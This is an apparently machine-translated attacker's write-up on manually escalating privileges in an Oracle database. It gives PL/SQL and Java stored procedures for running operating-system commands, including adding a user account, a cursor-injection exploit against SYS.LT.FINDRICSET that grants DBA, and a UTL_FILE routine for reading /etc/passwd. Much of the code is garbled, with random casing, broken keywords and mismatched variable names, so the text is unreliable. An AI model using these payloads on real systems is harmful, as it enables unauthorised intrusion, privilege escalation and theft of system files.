Manual injection of Oralce database elevation notes

Soon, I connected to the oracle server and found: 1. the dba permission is not granted after the connection. 2. SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES vulnerability 3. run SELECTUTL_HTTP.request (http: xxxxxxxxxxxlogin. jsp) after FROMdual, it is found that the oracle server cannot connect to the network. Lucky

Soon, I connected to the oracle server and found that:

1. the dba permission is not granted after the connection.

2. You cannot use SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES to escalate permissions.

3. Run SELECT UTL_HTTP.request (&LsQuo; http: // xxxxxxxxxxx/login. jsp ') FROMDuThe oracle server cannot connect to the network.

Fortunately,

Run

Create or replace fuNcTion Linx_Query (p varchar2) return number authIdCurrent_user is beginExECutE immEdIate p; return 1; end;

Successful! This user has the create proceduce permission.

Now I want to create a java extension for execution.Command:

Create or replace and compile java source named "LinxUtil" as import java. io. *; public class LinxUtil extends Object {publicStatIc STrIng runCMD (String args) {try {BufferedReader myReader = new BufferedReader (new InputStreamReader (RunTime.Getruntime(cmd.exe c (args). getInputStream (); String stemp, str = ""; while (stemp = myReader. readLine ())! = Null) str + = stemp + ""; myReader. close (); return str ;}CatCh (Exception e) {return e. toString ();}}}

Begin dbms_java.grant_peRmIssion ('public', 'sys: java. io. filepermission', '<>', 'execute '); end;

Create or replace function LinxRunCMD (p_cmd in varchar2) return varchar2 as language java name 'linxutil. runCMD (java. lang. String) return string'

Select * from all_objects where object_name like '% LINX %'

Grant all on LinxRunCMD to public

Select LinxRunCMD ('cmd/c net user linx/Dd') From dual

But the first step gets stuck. The server cannot create java extensions for some unknown reason !!

Fortunately, we also have the UTL library available to use:

Create or replace function LinxUTLReaDfIle (FileName varchar2) return varchar2 is

FHandler UTL_FILE.FILE_TYPE;

Buf varchar2 (4000 );

Output varchar2 (8000 );

BEGIN

FHandler: = UTL_FILE.FOPEN ('utl _ FILE_DIR ', filename, 'R ');

Loop

Begin

Utl_file.get_line (fHandler, buf );

DBMS_OUTPUT.PUT_LINE ('cursor: '| buf );

Exception

When no_data_found then exit;

End;

Output: = output | buf | chr (10 );

End loop;

UTL_FILE.FCLOSE (fHandler );

Return output;

END;

UTL_FILE_DIR must be used first:

Create or replace directory UTL_FILE_DIR AS '/etc ';

Specify the object. However, no permission is found after running. I had to find a way to raise the right.

***************

I wrote N pdf files to introduce this technology. I simplified the Code:

DECLARE

Skype NUMBER;

BEGIN

PY: = DBMS_ SQL .OPEN_CURSOR;

DBMS_ SQL .PARSE (ACC, 'descare pragma autonomous_transaction; begin execute immediate "GRANT DBA TO linxlinx_current_db_user"; commit; end; ', 0 );

DBMS_OUTPUT.PUT_LINE ('cursor: '| metrics );

Begin sys. LT. FINDRICSET ('.' | dbms_ SQL .execute ('| YY |') | ")-', 'x'); END;

Raise NO_DATA_FOUND;

EXCEPTION

WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE ('cursor: '| ACC );

When others then DBMS_OUTPUT.PUT_LINE ('cursor: '| ACC );

END;

After the operation, you have the dba permission to reconnect to the database ......

Now you can read the file:

Create or replace directory UTL_FILE_DIR AS '/etc ';

Select LinxUTLReadfile ('Passwd') From dual

It's easy to follow.